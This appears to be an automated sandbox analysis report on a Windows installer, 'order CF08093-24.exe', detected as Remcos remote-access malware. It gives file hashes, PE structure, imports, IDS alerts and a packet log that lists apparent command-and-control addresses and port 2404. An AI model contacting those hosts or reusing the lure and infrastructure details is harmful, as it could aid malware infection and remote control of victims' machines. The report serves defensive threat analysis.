                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview:..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.828214989600231
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:order CF08093-24.exe
                                                                          File size:794'991 bytes
                                                                          MD5:19c071ae3e499df299092283e301b7a2
                                                                          SHA1:711e76279688465f62fd3de93ba05328393439cd
                                                                          SHA256:edc42c5e0e81b4e0598f17cf43ad139e934e32e2538c97811e3b995fa139199f
                                                                          SHA512:7b59e6918084d752e73b329e0ba201c65177bbe5239ab725d6906823b3bdf3d7299c0f6517312ca7f54a1acc5fefadf1f2e8551cd511f38cea3b889c8a1ba187
                                                                          SSDEEP:24576:UXqzrTlCjH1awESBysQiaQtrxE0lmB4QT31V1how/:WKcj8SnQiaQU0lmB4S3H1H
                                                                          TLSH:A0F402917991163FC19D403FB1672B71EF6B9FA842776402A123FF0BB5317A67E08A42
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

                                                                          File Icon

                                                                          Icon Hash:71868ed4e8b04d49

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x40351c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          sub esp, 000003F8h
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebp, ebp
                                                                          push 00008001h
                                                                          mov dword ptr [esp+20h], ebp
                                                                          mov dword ptr [esp+18h], 0040A2D8h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [004080A4h]
                                                                          mov esi, dword ptr [004080A8h]
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push eax
                                                                          mov dword ptr [esp+4Ch], ebp
                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                          mov dword ptr [esp+00000150h], ebp
                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007F5A80CD04CAh
                                                                          lea eax, dword ptr [esp+34h]
                                                                          mov dword ptr [esp+34h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [esp+48h]
                                                                          mov ecx, dword ptr [esp+62h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [esp+00000148h], ax
                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                          jnc 00007F5A80CD0498h
                                                                          and word ptr [esp+42h], 0000h
                                                                          mov eax, dword ptr [esp+40h]
                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                          mov dword ptr [00429AD8h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [esp+38h]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [esp+00000148h]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          movzx ecx, byte ptr [esp+0000004Eh]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1f780.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x4d0000x1f7800x1f8008e8a3197e2686a2d1e03890bd5970dadFalse0.5309554811507936data6.149455977169068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x4d2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.25881343901573406
                                                                          RT_ICON0x5db200x9f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9983811626195732
                                                                          RT_ICON0x67a680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4413900414937759
                                                                          RT_ICON0x6a0100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5112570356472795
                                                                          RT_ICON0x6b0b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6077868852459016
                                                                          RT_ICON0x6ba400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.650709219858156
                                                                          RT_DIALOG0x6bea80x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x6bfa80x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x6c0c80xc4dataEnglishUnited States0.5918367346938775
                                                                          RT_DIALOG0x6c1900x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x6c1f00x5adataEnglishUnited States0.7888888888888889
                                                                          RT_VERSION0x6c2500x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.5504032258064516
                                                                          RT_MANIFEST0x6c4400x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                          Imports

                                                                          DLLImport
                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                          KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-10T13:52:56.311136+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549922212.162.149.8980TCP
                                                                          2024-12-10T13:52:59.770777+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549933212.162.149.912404TCP
                                                                          2024-12-10T13:53:01.890405+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549939212.162.149.912404TCP
                                                                          2024-12-10T13:53:02.178716+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549940178.237.33.5080TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 13:52:55.029892921 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:55.149224043 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:55.149346113 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:55.150271893 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:55.269686937 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311058044 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311099052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311110973 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311136007 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.311157942 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.311240911 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311253071 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.311285019 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.350718021 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.350734949 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.350748062 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.350778103 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.350797892 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.350837946 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.350850105 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.350879908 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.431345940 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.431427956 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.431658983 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.431706905 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.434822083 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.434866905 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.503042936 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.503103971 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.503132105 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.503171921 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.507191896 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.507251024 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.509043932 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.509090900 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.509150982 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.509188890 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.517129898 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.517191887 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.517224073 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.517267942 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.525543928 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.525590897 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.525633097 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.525671959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.533941031 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.533989906 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.534018993 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.534060955 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.542723894 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.542769909 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.542869091 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.542917967 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.546956062 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.547003031 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.547024012 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.547063112 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.555206060 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.555253029 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.558382034 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.558437109 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.558465004 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.558532953 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.566641092 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.566699028 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.566766977 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.566806078 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.574343920 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.574457884 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.574521065 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.581944942 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.582017899 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.627471924 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.627582073 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.627626896 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.695317984 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.695349932 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.695420980 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.697412014 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.697463036 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.697518110 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.697560072 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.701854944 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.703479052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.703527927 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.703615904 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.703663111 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.707990885 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.708098888 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.708149910 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.712403059 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.712503910 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.712538958 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.712538958 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.716844082 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.716901064 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.716953039 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.716988087 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.721281052 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.721335888 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.721384048 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.721422911 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.725725889 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.725815058 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.725860119 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.730214119 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.730324984 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.730376959 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.734561920 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.734966993 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.735014915 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.735086918 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.735127926 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.739696980 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.740045071 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.740097046 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.743895054 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.743937969 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.743989944 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.748368025 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.748454094 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.748507977 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.752810955 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.752943039 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.753006935 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.757286072 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.757329941 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.757380962 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.760879040 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.761092901 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.761149883 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.764491081 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.764568090 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.764624119 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.768088102 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.768205881 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.768255949 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.771723032 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.771822929 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.771869898 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.775362968 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.775449038 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.775507927 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.779268026 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.779535055 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.779584885 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.782643080 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.782696962 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.782747030 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.887499094 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.887660027 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.887725115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.888863087 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.888910055 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.888919115 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.888952017 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.891505957 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.891575098 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.891627073 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.894174099 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.894222975 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.894294977 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.894344091 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.897150993 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.897279024 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.897334099 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.899496078 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.899533987 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.899590969 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.901803017 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.901875019 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.901931047 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.904258966 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.904320955 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.904398918 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.904443026 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.906737089 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.907030106 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.907078981 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.909090996 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.909128904 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.909148932 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.909182072 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:52:56.911485910 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:52:56.911607027 CET8049922212.162.149.89192.168.2.5
